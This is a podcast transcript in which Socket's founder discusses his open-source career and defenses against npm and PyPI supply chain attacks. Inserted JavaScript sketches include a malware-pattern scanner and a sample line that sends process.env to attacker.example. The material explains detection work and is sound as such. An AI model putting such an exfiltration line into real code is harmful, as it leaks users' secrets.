EPISODE 1868 [INTRODUCTION] [0:00:00] Announcer: Modern software relies heavily on open-source dependencies, often pulling in thousands of packages maintained by developers all over the world. This accelerates innovation, but also creates serious supply chain risks as attackers increasingly compromise popular libraries to spread malware at scale. Feross Aboukhadijeh is the founder and CEO of Socket, which is a security platform designed to protect software projects from open-source supply chain attacks. In this episode, he joins Josh Goldberg to talk about his career in open source, open-source supply chain attacks, practical security lessons, the expanding attack surface in software development, and more. This episode is hosted by Josh Goldberg, an independent full-time open source developer. Josh works on projects in the TypeScript ecosystem, most notably typescript-eslint, the tooling that enables ESLint and Prettier to run on TypeScript code. Josh is also the author of the O'Reilly Learning TypeScript book, a Microsoft MVP for developer technologies, and a live code streamer on Twitch. Find Josh on Bluesky, Mastodon, Twitter, Twitch, YouTube, and joshuakgoldberg.com. [INTERVIEW] [0:01:27] JG: Feross Aboukhadijeh, welcome to Software Engineering Daily. [0:01:30] FA: Thanks, Josh. Glad to be here. [0:01:31] JG: We're excited to have you. You have been in and around open source and general security practices for quite a while. Before we dive into you and Socket, can you tell us how did you get into coding? [0:01:41] FA: Yeah, I got into coding when I was in high school. I wanted to build a website to collect my favorite Flash animations. So, I was kind of born in the era of Newgrounds, and eBaum's World, and Albino Blacksheep, and just all these kind of - I don't know if folks remember these or if they're too young. I don't know the audience of this show.
But yeah, I always thought those things were fun, and I wanted to kind of collect them all and put them onto one website. I did a lot of downloading of those SWF files from other people's sites and then rehosting them on my own page. And I had to learn PHP to do that and MySQL. And so, that was kind of my first foray. [0:02:13] JG: And then you went into Stanford for computer science after that. [0:02:17] FA: I mean, yes, I did go to Stanford to study CS. My high school didn't have a CS class, so I kind of was just self-taught with PHP up until that point. But learning CS at Stanford was amazing. A lot of the other majors at Stanford, they don't really necessarily emphasize teaching well, but that's one thing that the computer science department really stands out in. They have just a ton of support. Other undergraduates actually are your TAs and help teach you. And so, I learned a ton. I remember my first class I took there, it was using C++. And I remember my first reaction was, "How does the computer know that these words are variables if they don't have dollar signs in front of them?" Because in PHP, every variable has a dollar sign. And so, my mind was blown. I almost spent too much time in PHP in high school, and it took a little bit of unlearning to kind of realize, "Oh, wow. CS and programming is this really broad thing. It's not just PHP and MySQL." [0:03:10] JG: Yeah. Do you ever go back and look at the PHP you wrote in high school? [0:03:13] FA: I have actually done that before, and it's hilarious. I didn't even know about functions even after years of writing it. I literally just pasted everything multiple times if I needed to do it in more than one place. It's horrible, but it worked. It kind of didn't matter in some sense. I built a site that got - I think at its peak, it had 600,000 annual visitors watching all those Flash videos. I don't know. It's kind of funny how I think the lesson from that is that you should just jump in and do stuff.
And I mean, I obviously would never write code like that now. But if you let doing things the right way get in your way, it can kind of take the fun out of it and stop you from just kind of, I don't know, catching the bug. And I caught the bug. What really got me excited and kept me going in it was this idea that I can put code online. And while I'm sleeping, it's working for me. It's serving visitors. People are coming to the site having a great time and I'm literally asleep. It's like that scene in Fantasia with the brooms and the buckets. I don't know. It's automation. I don't know. It's just sort of this cool idea of like this thing is just out there. And I think at one point, I put Google AdSense on the site. And so I was like, "Oh, I'm sleeping and it's making me money." It's such a cool idea. Yeah. I don't know. That got me really into stuff in high school and college. [0:04:30] JG: Believe it or not, it's not having excellent, clean code that gets a lot of newcomers in. It's the results and being able to have that superpower. Yeah. [0:04:37] FA: Yeah. That said, I also think it's good to use functions. I wouldn't recommend anyone copy what I did in those early days. [0:04:44] JG: Good to know. That was your first popular website. What was your second popular or hit project or website that got released? [0:04:52] FA: So, while I was still in high school, I did another site that was around sharing my notes for my AP classes that I was taking with other students. You could go there and access outlines of different chapters in the book. It was kind of like a SparkNotes for AP courses. And that was great because a lot of high schoolers didn't want to read their textbook. And so, that was something that got quite popular. That's also when I started learning about SEO, and just all the web search type stuff, and like, "How does Google work?
How do you properly semantically build web pages that are going to be indexed by Google that Google's going to love indexing and sending visitors to you?" That was a cool way to learn. And then after that, when I went to college, there was one other site that I did that was maybe notable, which was called YouTube Instant. And this was kind of the result of a bet that I did with a college roommate of mine. Google had just announced this thing called Google Instant, which was a way to kind of - it's kind of like autocomplete on steroids. As you type letters into the search box, instead of just showing you here are five possible searches that you might want to do, it would actually take you to the search results page of the first suggestion before you even hit enter. So, you type A, and then it takes you to this actual search page with the 10 links for Apple or whatever it thinks you were searching for. And so, I saw that and I was like, "Oh, that's cool. I bet I could do that for YouTube." And that would be even more cool, because now you're typing letters in and you're getting flashes of different videos coming in. And it's almost like channel surfing, like YouTube. And so I bet my friend I could build it in an hour, which was kind of completely ridiculous. But I just thought like, "Oh, let me just -" I don't know why I did that, but I did. And then he was like, "Yeah, I'll take you up on that." And then I actually did build it in three hours. It was very simple. It was just using the YouTube API and putting a video embed into the page. No fancy web frameworks, no futzing with getting TypeScript, and React, and all that stuff set up. It was just literally like one JS file and one HTML file. Very, very simple. Pretty horrible code as well. But got that up. And then I put a tweet out and a Facebook post out and went to sleep. And then I woke up the next morning, and it was completely viral. It had gone across the internet overnight while I was sleeping.
And I don't, to this day, really know why. I think if I had to guess, it was because it was - I mean, it was pretty fun. Once you used it, people wanted to share it. But it was also because it kind of like piggybacked on Google Instant. And they had spent two years engineering Google to support that level of new load just in terms of number of search pages being loaded as literally everyone typing letters. It's like 10x or more of the search volume that they had ever had in the past. And so, they hyped up how much engineering effort they put into this. And then, lo and behold, some college sophomore comes along and is like, "I built the same thing for YouTube in three hours." And then that somehow unintentionally became this media story. And then it was fueled even further because the YouTube CEO tweeted to me and said, "Hey, this is great work. Do you want a job at YouTube?" And then that caused a whole other burst of attention. People were talking about how the resume is dead. And building projects and putting them out there is the future of getting hired. And all these thought pieces came out of it. And I was just like kind of swept up in this media storm basically. It was kind of a fun experience to go through as a sophomore and kind of trying to not say something stupid while getting interviewed by NBC or whatever, you know? So, it was pretty cool. [0:08:11] JG: That sounds like a very thrilling ride. Are there particular lessons you took away from it that you still use now as a CEO on the other side of the hiring table? [0:08:20] FA: Huh. Yeah. I mean, I think the big thing is just launch, just ship things. Don't think too much about it. Build stuff in public. I mean, if I had sat around and, I don't know, tried to use the right framework or tried to - and it's funny, I say this like I'm actually good at this, but the reality is I'm more saying this as advice to myself to remember. 
Because I also tend to overengineer things and want to do things the right way and sometimes don't ship. And what I think worked in this case was I just put it out there. It didn't really matter that it was pretty bad code. I put it out there and then I improved after I saw that people actually cared. And so that's the right way to do things. If you're interested in finding something that works or that resonates with people, it's really about the number of things you put out there, not sitting around in a room by yourself trying to think of the perfect idea. And that's a lesson I've had to learn again over and over in my career, including literally when I started my first company. And we kind of did the opposite of that, where we literally just sat around and built some cool technology for about eight or nine months without really putting it in front of any users. And then, at the end, learning, "Actually, nobody wants this. We just spent nine months building -" it's a cool science project. I learned a lot. I'm glad I worked on it. But nobody wants to buy this or use this. I could have probably learned that really quickly if I just talked to people or had put something more minimal out there. [0:09:37] JG: Mm-hmm. You are not the first CEO to mention this on this podcast. Yeah, that's a really important learning. [0:09:44] FA: Yeah, there was even a guy on Hacker News when YouTube Instant was on the homepage. It was actually on the home page a couple of times, multiple times at the same time. And then one of the comments, I remember was this guy who - I don't know who he was, but he was really upset that my site was on the homepage. Because he said, he's like, "I've been building the same site for 3 months and it has way more features and it supports filtering and sorting the videos by views and by different things." And he kind of was explaining all the things it could do that mine couldn't. 
But then someone replied to him and was like, "You should have just shipped." And I saw that, and I was like, "Evidence of this lesson literally in that thread." I mean, I obviously felt kind of bad for him. He put in a ton of time. But it sort of proves the point of he should have just shipped. And no one really cares about all the advanced options he was adding. And he should have just put it out there sooner. [0:10:33] JG: Yeah, it's a pity. You've shipped quite a few things. We could take this either through your career or through your open source projects in general. Let's talk about the open source projects first because they're quite visible. Is this a continuation of the same mindset of you just shipped a bunch of npm packages? How does that play out? [0:10:49] FA: Yeah. I mean, I got into open source originally because after that company I mentioned, it was called PeerCDN, that I worked on for about eight or nine months, basically, we were going to shut it down. And then we got really lucky. And, kind of out of nowhere, Yahoo offered to buy the company. And, really, they wanted us to just join the team and work on JavaScript, and video players, and stuff like that at Yahoo. So, we took the offer because it was - me and my two friends, and we were like, "Well, yeah, this sounds like a good way to wrap this up and make something of this unfortunate situation that no one actually wants what we built. Maybe we can go to Yahoo and they'll use it." But they ended up not using the code really at all. They had bigger problems than reducing bandwidth costs of video. And so, we ended up just kind of helping with more fundamental things like making their video player load quickly and work on mobile and stuff like that.
But I did feel kind of sad that after all that work, that science project I was talking about, all this cool technology and stuff we had put into it didn't get to see the light of day, and would never get to see the light of day because now they owned it, and it was all proprietary code. And so after I left - I worked there for about a year. And I'm proud of what I did there, but it was also one of those things where it's a really big company and it was like hard to ship things. I felt like I was fighting the company to ship things, which is crazy. At one point, my manager said to me, "You need to do less. Just stop trying to do all this stuff. You're making my life hard." I remember thinking this is not why we were acquired. Literally, the CEO of Yahoo, Marissa Mayer, at the time told us - and she was on a startup acquisition spree during this time. She told us the reason we're buying you is because we want you to inject startup energy and just this attitude of getting things done, and shipping stuff into the company. And this is why we're bringing you on. But we were just too few. And we were on a much bigger team with the old school folks that were there before. And so we did some good stuff. And there were some really smart people on the team. But ultimately, I think the organization couldn't really handle it. The old blood won rather than the new blood, if that makes sense. I left. And then I wanted to play with some of the same ideas of what the original company was doing, which was about building a peer-to-peer CDN. Think a content delivery network, like Cloudflare or Akamai, but powered by end-user devices. Your laptop is in the network, kind of like BitTorrent. And if you're watching a video, you're going to serve that video to other folks that are coming to the same site, and it's sort of like a big peer-to-peer network.
And that could speed up sites in some cases, and it could also massively reduce the cost to host sites, which, before Cloudflare was really popular, CDNs were actually quite expensive before they started giving everybody bandwidth for free. And so this is where the idea came from. And so after I left Yahoo, I just decided, "Oh, it'd be cool to build that again, but in an open source way. So that no one can ever take it away from me or from the community, I want this to be open. I want anyone to be able to use this." And so that was why I got into open source. I mean, I had always thought of open source maintainers as this sort of crazy, awesome level of programmer that I one day wanted to aspire to be. When I was learning to code, I was almost afraid to look at open source packages because it was like all this crazy advanced code that how could you understand what it's doing? I thought it would be cool to do that and give back in that way. And then I had this opportunity to do it with WebTorrent. And so, that's kind of what came out of all this was I ended up building a torrent app that could work in your web browser and do peer-to-peer, from my browser tab to your browser tab, without any software installed on the computer. And so you could really get a BitTorrent experience on a website. [0:14:16] JG: Which is amusing now, because BitTorrent has BitTorrent Web. [0:14:18] FA: Yeah. And, actually, they use WebTorrent under the hood, the protocol that we developed. All the major torrent clients actually support WebTorrent now, finally, after 10 years of trying to get adoption of this standard. It's pretty cool to see that the vision has actually kind of happened, where any torrent client running on a desktop can talk to a web browser user across that bridge, which is pretty crazy, I mean, when you think about it, that that's actually possible with WebRTC.
[0:14:47] JG: As an open source maintainer, how do you feel when one of the projects you lead, or maintain, or have worked on becomes successful in this way? [0:14:54] FA: That's a fun one. At first, it's awesome, right? I mean, you get to talk about it, people are interested in it, you get invited to speak at NodeConf, or JSConf, or whatever. And I remember at that time in my life, I was in my early 20s, and it was super fun getting to go travel the world. I went to so many countries I'd never been to before, met people. And it was funny too because people - they would use me and a few other early Node folks as the mad science track of the conference. They'd have all these talks on React and kind of practical things, like how do you deploy a microservice? And this, and that, and the other thing. And then they wanted to have certain talks that were like, "You're never going to use this at work, but it's just cool." And that's what they would invite me to be - the entertainment, I guess, in that sense. And so I think that's why I was invited to those. And it was just fun to be able to show people what I was building. And it was also very in public. Because, honestly, for the first six months of talking about WebTorrent, it didn't work. It was literally in development. And I was talking about it and explaining how WebRTC worked, and how this was all going to work. And doing some cool demos of WebRTC for people during the talks, some live demos and interactive things with people all interacting on a whiteboard from their phones and on my screen, and over peer-to-peer network. And it was really cool, but it wasn't WebTorrent. And so I was definitely doing it in the open, and it was really fun.
But then when you get to a certain point in your project, what ends up happening - I've seen this happen so many times, not just with me, but with basically almost every maintainer, not all, but almost every maintainer that I know - is that they eventually just get burned out of doing it. Because, at least for me, what happened was I felt this incredible responsibility to fix every issue that was reported on GitHub. And at first, the volume was really low. Someone would open an issue and you'd be like, "Oh my god, this is so cool. I have a user using this." And you're so happy. And then, eventually, you get to a place where you wake up every morning and there's like 40 issues opened and you're like, "Oh, my God. This is not sustainable." And I kind of forgot why I got into it almost by the end. Because I was like, "Someone's reporting a bug. Oh, it doesn't work on Arch Linux version whatever." And I'm like, "Okay, I don't even care." I should have just said to them, "You submit a PR if you care about this and I'll review it and merge it." But instead I took it like, "Oh, it's my job to go and fix it." And so I very much burned myself out by the end and basically needed to walk away and add other folks as maintainers and just kind of go do something else for a while. [0:17:16] JG: There's a great blog post that you've, I think, alluded to in the past from Nolan Lawson about what it feels like to be an open source maintainer. Talking about how it's like you have this giant stretch of people in front of you, and there's absolutely no way you can address all of them. And it feels awful on both ends. [0:17:31] FA: Yeah, it definitely feels like that. You want to do the right thing and help them. And you feel this obligation. Because it's like your code, and they found a bug, and they're right. There is a bug. And like, "You're correct. And so, therefore, I must fix it."
But, actually, there's not a contract saying that you have to do that. It's like I put this code online as a gift to the world. I didn't promise it would never have a defect. And so it's actually okay. It's actually enough to give a one-time gift. You don't have to give a permanent SaaS subscription of your time as a gift to the whole world. I think that was the realization that I finally got to, but after getting super burned out. [0:18:06] JG: Let's talk about that dark side of open source because it transitions really well into what you've been doing recently. Specifically, let's talk about security. What is socket.dev, and what's the open-source problem that it's trying to address? [0:18:19] FA: Open-source, when it works, is amazing, right? You can just go out and grab any code from the internet that's written by somebody you don't know. You don't know who they are. You probably didn't even read the code. And you can just pull it in and run it on your computer and saves you a ton of time, right? It's this amazing buffet of unlimited, all-you-can-eat code that you can just pull from. But there are bad guys, there are criminals that have realized that actually getting access to an open source project and putting malicious code into the package is a great way to attack a bunch of people at once at a really large scale. And so we've seen a lot of attacks of this nature over the last several years for all kinds of motives. Sometimes it's politically motivated. Countries attacking other countries, or trying to attack US companies, or things like that. Other times, it's just basic cryptocurrency criminals that want to just steal people's crypto. There's even been cases where people have - they were a good maintainer at one point in time, and then something just snaps in them and they want to watch the world burn. And so they'll put malicious code into their own package that has been trusted for super long. 
And so it made me start wondering, why is there no way to stop this? Why is there no way to catch this? Especially after the fifth or sixth time I saw this happen. I mean, the first time I saw this happen was in 2017 with event-stream getting compromised. This was a package where a new maintainer was added who basically said, "Hey, can I help maintain this package? I noticed it hasn't got any updates in a while." And they got access. And then after about 30 days of doing some good changes, they put in a malicious change that stole a bunch of cryptocurrency out of a specific application that was targeted. They obfuscated the code and then it only triggered in one specific Electron app. For everyone else who had the code, it just sort of did a no-op. But in this one app, it would trigger and steal all the user's money. This kept happening. And then I looked around, and I was like, "Why is no one doing anything about this? Is this just like the way the world works?" I was also confused. Why is nobody reading the code that they're using? And then I realized I'm really weird, and I read every one of my dependencies before I use it. I mean, maybe not anymore. But when I was working on WebTorrent, certainly it was a small enough surface area that I could actually do that. And then I realized like no one else really does this. It's a pretty rare thing. Like some people do, but it's pretty rare. And so that's why there's really not much of an immune system against this. Usually, what happens is the attacker makes a mistake that ends up showing in a log file or something, and then the community just accidentally discovers it. And that's what kept happening. It was always like, "Oh, we accidentally noticed that this package has been stealing everyone's information for the last two weeks." And that's when I was really worried because I'm like, "How many more of these do we not know about if we're just accidentally finding these?"
In the event-stream example, I'll give you an example of how we found it as a community. It turns out the attacker obfuscated their code, and they were using the crypto module in Node.js to decrypt the attack code. But they didn't know that, literally a day or two after they backdoored the package, Node decided to deprecate the function that they used. And so, everybody who was using the package started getting this deprecation warning. And then they traced it back to this chunk of code that was added into this library. And so that's such a random accident. If that hadn't happened, it might have gone for weeks or months without being discovered. And this pattern just repeats in every one of these attacks. And so that's kind of when I was like, "Dang, this is a problem." And no one seems to know how to solve it. [0:21:45] JG: What are the techniques that we can use as application developers, separate from, say, Socket, just to kind of harden ourselves against these before we go into specific services? [0:21:54] FA: Yeah. Yeah, for sure. I mean, the number one most important thing that everyone should be doing, and everyone is probably already doing, but if not, you should use a lock file. Your package manager, depending on the language, but almost all of them support a lock file of some kind. And this is very important because it locks down the specific versions of every package in your dependency tree, so that when a new person on your team clones the code down and runs the install command to install those packages, they're going to get the exact same set of dependencies that you had when you built the application. And so there's no randomness, or there's no new versions being brought in unintentionally. It's very explicit. There's also a record of what versions of every package were in use in the git history, so everyone knows what was in use at every point in time in the application. That's the number one thing you can do.
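To make the lock file point concrete, here's a small sketch. All the package names, versions, and the tree shape below are invented for illustration; the idea is just that without a lock file, any loose semver range anywhere in the tree can resolve to a different version on each fresh install.

```javascript
// Sketch: why locking down the whole dependency tree matters.
// Package names and versions here are invented for illustration.

// A semver range is "loose" if it can resolve to more than one version.
function isLooseRange(range) {
  // Exact pins look like "1.2.3"; anything with ^, ~, x, *, >, <, or ||
  // can float to a newer version at install time.
  return !/^\d+\.\d+\.\d+$/.test(range);
}

// Walk a (simplified) dependency tree and collect every loose range.
function findFloatingDeps(tree, path = []) {
  const floating = [];
  for (const [name, info] of Object.entries(tree)) {
    const here = [...path, name];
    if (isLooseRange(info.range)) {
      floating.push({ dep: here.join(" > "), range: info.range });
    }
    if (info.dependencies) {
      floating.push(...findFloatingDeps(info.dependencies, here));
    }
  }
  return floating;
}

// The app declares "some-lib" with an exact version, but some-lib's own
// manifest uses "^" - so without a lock file, the transitive dependency
// still floats to whatever is newest at install time.
const tree = {
  "some-lib": {
    range: "4.2.0",
    dependencies: {
      "transitive-lib": { range: "^2.1.0" },
    },
  },
};

console.log(findFloatingDeps(tree));
// -> [ { dep: 'some-lib > transitive-lib', range: '^2.1.0' } ]
```

A lock file (package-lock.json, yarn.lock, and so on) records the exact resolved version of every node in this tree, which is exactly what the loose ranges leave open.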
That obviously doesn't stop you from installing a bad package, but at least you're not just pulling in whatever happens to be the latest version at the time you run the install command. And I want to emphasize, too, it's important that you're using a lock file and not just pinning your direct dependencies to a specific version. If you pin your direct dependencies, that's a good start, but that doesn't lock down the transitives. Because those can also have loose ranges. And then the package manager will go ahead and will install your direct dependency at that exact version. But then in the transitive dependencies, those can be loose ranges that it'll just pull the latest stuff as well. You're still subject to really - you're going to get whatever code happens to be there at the time you run install. I think that's the biggest thing. [0:23:25] JG: What's another good tip for us? [0:23:27] FA: I mean, really the best tip is to use Socket. But I don't want to - and I'm not just saying that because I started the company. I mean, forgetting about the specific solution of Socket. Really, you want to have some process for vetting dependencies. You want to know what you're depending on. And I think what really helps is having a bit of a mindset shift around how you think about dependencies. Today, a lot of people think about them as just this magical code that just comes from the cloud or from the sky somewhere, and then it just sort of solves your problems for you. And they assume, because it's open source, that it must be safe or that someone is vetting it, right? But that is really not the case. I mean, everyone is assuming that someone else is vetting this code, right? Everyone has that assumption, "Oh, yeah. It's open source. Someone will vet it." Everyone is making this assumption. And then you actually realize that very few people are actually opening up the code and looking at it. Shockingly few, right? 
This is really obvious when you look at the kinds of attacks that have been pulled off by these attackers and not discovered for, like I said, weeks, sometimes months. They're so obvious, these attacks. If you just open one of the JS files or one of the source code files, you would see - it doesn't look like normal code. It looks super obfuscated. Or there's these giant Base64 strings in there. There's the crypto module being imported to decrypt the code. Or there's eval happening. A string is being executed as code. Or there's obvious things like the environment variables are being collected and then sent off in a network request to a suspicious URL. It's like horribly obvious when you look at the file, and then you realize, "Okay, no one is looking at this stuff." This is how it's able to sit in plain sight. It's interesting, because Linus Torvalds, the creator of Linux, has this law. I think it's called Linus's Law, and it's quite well-known. I think it's the idea that, given enough eyeballs, all bugs are shallow. Hope I'm getting the quote right. But something like that. And the idea is that with open source software, eventually, with enough eyeballs looking at the code, all bugs will be discovered at some point and then be fixed. And it's true. And he's really highlighting like the value of open source code versus proprietary code. And how when you have open code, people can find these things, they can fix these things. And that is all true. But the question is on what time scale, right? How long is it going to take for the community to find the bug, right? And in the case of a malicious actor putting malware into a library that everybody depends on, the time really matters because some of these things have 10 million downloads a week. And so if something's compromised for even 24 hours before people notice, you're going to have a lot of affected people, a lot of affected applications and companies. And so I think that's really the caveat, is how long until detection.
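The "horribly obvious" signals described above can be sketched as a toy scanner. This is purely an illustration: the patterns, the defanged sample, and the URL are all invented here, and real analysis (Socket's included) goes far deeper than regex matching.

```javascript
// Toy scanner for the kinds of obvious red flags described above.
// Patterns are illustrative only - real malware analysis is far deeper.

const SUSPICIOUS_PATTERNS = [
  { name: "eval of dynamic code", regex: /\beval\s*\(/ },
  { name: "child process execution", regex: /child_process/ },
  { name: "environment variable access", regex: /process\.env/ },
  // Giant Base64 blobs often hide an encrypted or encoded payload.
  { name: "large base64 blob", regex: /["'][A-Za-z0-9+\/=]{200,}["']/ },
];

function scanSource(source) {
  return SUSPICIOUS_PATTERNS
    .filter(({ regex }) => regex.test(source))
    .map(({ name }) => name);
}

// A schematic (defanged) exfiltration snippet of the sort described above:
// environment variables collected and posted to an attacker-controlled URL.
const sample = `
  const data = JSON.stringify(process.env);
  fetch("https://attacker.example/collect", { method: "POST", body: data });
`;

console.log(scanSource(sample));
// -> [ 'environment variable access' ]
```

The point isn't that these checks are hard to write - it's that, as described above, almost nobody was opening the files to look.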
And before we started Socket, what we saw was there was a great research paper published in the USENIX Security Conference a few years ago that found that it was around 200-plus days for a malicious package to be discovered by the community and taken down. Really, really bad results. You know what I mean? In terms of hoping for the community to kind of self-correct in this way. I think the main thing is just shifting and thinking of open source code not as like someone else's problem, but actually treating it as your problem. It's part of your application. At the end of the day, all this code gets bundled together and run in a single process, or in a single binary, or in a single application. And so it doesn't really matter if you wrote this code and then someone else wrote that other code. Ultimately, you're shipping all that code together to production, and you're responsible for what it does. It has access to all your user data. It has access to all the crown jewels. At the end of the day, it's your code. Even though you got it from GitHub or you got it from PyPI. [0:27:05] JG: We have this problem where there's an absurdly fast-growing amount of other people's code in our applications. These days, we as developers expect so many features, hot module reloading, and deduplication of packages, and all this, so there's just an inhuman amount of code to look through. Having services look at that code for us seems like a natural next step. And you mentioned some kind of somewhat straightforward heuristics, like importing the Node crypto module or sending your process environment variables in a network request, stuff that's almost humorously evil. How does Socket take a look at the other people's code and determine what is something to be complained about? [0:27:44] FA: Yeah, great question. When we started Socket, we started with our own observations about these types of attacks we were seeing.
Things like accessing environment variables, accessing the file system, accessing the network. Especially when that was a new behavior in a package, when it hadn't done that for any other version in its entire history, and then, suddenly, there's a new version that came out yesterday that needs all these capabilities, all these permissions that weren't needed before. And so that's what we started focusing on: detecting just that introduction of new risky capabilities. Oh, install scripts are another good one. Not all package managers have this concept, but npm is a famous one that does. This is a way to automatically run code on the developer's system at the time of package installation. And while it has legitimate uses, almost every single piece of malware that we were seeing on npm took advantage of this functionality. The presence of one of these didn't necessarily mean you were dealing with malware, but pretty much all malware had that characteristic. You could start to build up these heuristics of what looks like a suspicious change, and then you could alert on them. If you're about to do an npm update, or you're about to pull in a new package for the first time, you could see what Socket had identified in that package.

But then what we found was a lot of teams wanted something even simpler than that. They wanted us to just have a yes-no, a Boolean: is this package malicious or not? And right as we started noticing that desire from folks, we got our hands on GPT-3.5. We were playing around with this idea of, can an LLM actually look at code patterns and figure out what the code is doing? The main way people were using AI at that time was just to build these little chatbots. You can chat with your database or whatever, right? These types of silly things, in my opinion. We were really asking, can they understand the concept of maliciousness?
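The two heuristics just described, lifecycle install scripts and newly introduced capabilities, can be sketched in a few lines (illustrative only, not Socket's implementation; `preinstall`/`install`/`postinstall` are npm's real lifecycle hook names):

```javascript
// A sketch of two of the heuristics described above (illustrative, not
// Socket's implementation): flag npm lifecycle install scripts in a
// package.json, and flag capabilities that are new in this version
// relative to every previously published version.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall"];

function findInstallScripts(packageJson) {
  const scripts = packageJson.scripts || {};
  return INSTALL_HOOKS.filter((hook) => hook in scripts);
}

function newCapabilities(previousVersionCaps, currentCaps) {
  // previousVersionCaps: one array of capability names per past release
  const seen = new Set(previousVersionCaps.flat());
  return currentCaps.filter((cap) => !seen.has(cap));
}

// A package that suddenly runs code at install time...
const pkg = { name: "some-lib", scripts: { postinstall: "node setup.js" } };
console.log(findInstallScripts(pkg)); // [ "postinstall" ]

// ...and that suddenly needs network and env access it never had before.
console.log(newCapabilities([["fs"], ["fs"]], ["fs", "network", "env"]));
// [ "network", "env" ]
```

Neither signal alone proves malice, as noted above; the point is that the combination of a brand-new version, a new capability, and an install hook is rare in legitimate updates and common in compromised ones.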
And can they look at the code and tell you whether there's something maybe worth a second look? And so, it didn't really work that well with GPT-3.5. But then GPT-4 came out, and we got access to the API while it was still in private beta. And then we found, "Holy crap. This actually works really well." What we had to do, though, because of cost, right? It's super expensive to use LLMs, especially if you're trying to scan every open source package. npm alone has like two million packages, not to mention all the other ecosystems. We had to decide when it was worth the cost and the expense to actually do that type of analysis. And so, we used some of those static signals that we had developed before. Does it have network access? Does it have file system access? Does it eval a string? Does it look like it has obfuscated code? Then we would take just those parts and feed them into the LLM. And that's how we built the system that we have today. It still has false positives. But if you put a human in front of it to do the final sign-off, you can actually get a really high signal from it.

And so, that's one of the main things that Socket provides for our customers today: you can get this really high-signal feed of whether packages are malicious or not, including new ones that are being backdoored that no one knows about yet. If you open up our feed right now, you'll literally find something from 30 minutes ago that was just published that's malicious, that's still live on the package manager registry, that you could install if you were so unlucky to do so. And we report them when we find them, by the way. So, we try to get them taken down to protect everybody. But we often get really, really slow response times from the different registries. Some of them are better than others. PyPI is pretty good these days. But a lot of the other ones are very slow.
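The cost-triage step described here, cheap static signals deciding when the expensive LLM pass is worth running, and sending only the flagged snippets rather than the whole package, might look roughly like this (a sketch with made-up signal names, not Socket's pipeline):

```javascript
// Cheap pass: run static signals over every file; only escalate to the
// expensive LLM step when something fires, and only send the matching
// snippets rather than the whole package. Signal names are invented
// for this sketch.
function triage(files, signals) {
  const hits = [];
  for (const [path, source] of Object.entries(files)) {
    for (const { name, pattern } of signals) {
      const match = source.match(pattern);
      if (match) hits.push({ path, signal: name, snippet: match[0] });
    }
  }
  return {
    escalate: hits.length > 0, // is the LLM call worth the cost?
    payload: hits,             // only the suspicious parts go to the model
  };
}

const signals = [
  { name: "eval", pattern: /\beval\s*\([^)]*\)/ },
  { name: "hardcoded URL", pattern: /https?:\/\/[^\s"']+/ },
];

const result = triage({ "index.js": 'eval(atob("aGk="))' }, signals);
console.log(result.escalate); // true
console.log(result.payload.length); // 1
```

The design point is the funnel: regex-grade signals are nearly free at registry scale, so the LLM only ever sees the small fraction of code that already looks suspicious.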
And so, you'll have things where there's malware from nine months ago that's still live that they just don't take down. You have to use something like Socket or some other database of this knowledge to protect yourself.

[0:31:31] JG: Let's say that I'm a company. I'm an enterprise. I have software with dependencies on, let's say, a couple of registries, npm and PyPI. What would I do? How do I use Socket to save myself from these ridiculous malware attacks?

[0:31:43] FA: Yeah. The easiest way is, if you're on GitHub or one of the other major source control systems, GitLab, Bitbucket, you can install Socket from the marketplace. And then we go right into your GitHub installation, and we can start observing all pull requests and all commits that are happening on all the repos, and we scan every single commit that we see. And so, we can do two things. One is, first of all, you just get visibility. What dependencies am I using across all my repositories? And you can have a snapshot of every point in time as that changes. If you ever want to know in the future, "Hey, did we ever use this bad package at this bad version number?", you can look it up and see. And then you can also get an inventory of all of your existing risk. Any malicious packages, or vulnerable packages, or other risks that you have within your current set of dependencies, you'll be able to see that. But the most important part is the preventative piece. That's in the pull request workflow, whenever a developer is adding a dependency or updating a dependency to a new version. Those are the two moments where you're bringing in new third-party code for the first time. And so, Socket will look at all those changes. And if there are any risks, it will leave a comment in the PR and tell all the folks on the team, the code reviewers as well as the original PR author, about the risk that was identified. And this is all configurable.
Obviously, malware is frequently what folks want to block. But you can even use it for things like, I don't want to use a package that hasn't had an update in five years. That would be a bad idea. Or, I don't want to use a package that has obfuscated code in there unless I click the link that Socket provides and go and look at why it's doing this. Does it make any sense? We have folks set it up in different ways, and you can customize it to what you care about for your team.

[0:33:31] JG: Sure. I imagine, especially in a time where so many companies and open source projects are using tools like Renovate and Dependabot to automatically send PRs for new packages. Something that's blown my mind is, most of the time, by default, these PRs come in as soon as possible. A lot of default configurations don't say to wait seven days after a package release. This feels like something that Socket would be very useful for, to make sure that you're not installing a malicious package immediately upon its introduction.

[0:33:59] FA: Yeah, that's a great point. One of the things that we've actually seen with a customer is Dependabot opened a PR, and then Socket came in and left a comment and said, "Do not upgrade to this package. It's malicious." It was like a battle of the bots. One bot is like, upgrade. And then another bot is like, don't upgrade. Yeah. No, totally. It's a really good point. And some folks do try to do a delay to protect themselves from these things. That is another piece of advice that I would recommend. If you have an easy way to not take in updates until seven, or 14, or 30 days have gone by, that's a really great way to avoid a subset of these attacks. It won't avoid all of them. As I mentioned, some of them stick around for hundreds of days even after Socket has identified them and reported them. It's not foolproof. And it also means that you're not going to get vulnerability fixes if you're waiting 30 days unconditionally.
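The delay advice here reduces to a simple age gate (a minimal sketch; the 30-day default is just the figure from the discussion, and tools like Renovate express the same idea as configuration rather than code):

```javascript
// Hold back a new release until it has aged at least minAgeDays.
// Minimal sketch of the cooldown idea discussed above; real tools
// express this as configuration rather than code.
const DAY_MS = 24 * 60 * 60 * 1000;

function oldEnoughToAdopt(publishedAtMs, nowMs, minAgeDays = 30) {
  return nowMs - publishedAtMs >= minAgeDays * DAY_MS;
}

const now = Date.UTC(2025, 6, 30); // July 30, 2025 (months are 0-based)
console.log(oldEnoughToAdopt(Date.UTC(2025, 6, 29), now)); // false: one day old
console.log(oldEnoughToAdopt(Date.UTC(2025, 5, 1), now));  // true: ~59 days old
```

The trade-off is exactly the one noted above: the same gate that keeps you off a day-old backdoored release also delays a day-old security fix.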
You might want to have a more nuanced policy where you wait 30 days unless there's a critical CVE, in which case you might want to do it sooner. Yeah, there are really a lot of options here.

[0:35:04] JG: One of the great and terrible points of working in security is that as soon as you fix or largely prevent one style of attack, the attackers will figure out another, somewhat more complex, area or style of attack. What do you think is the next round, or the next area that you're going to have to focus on?

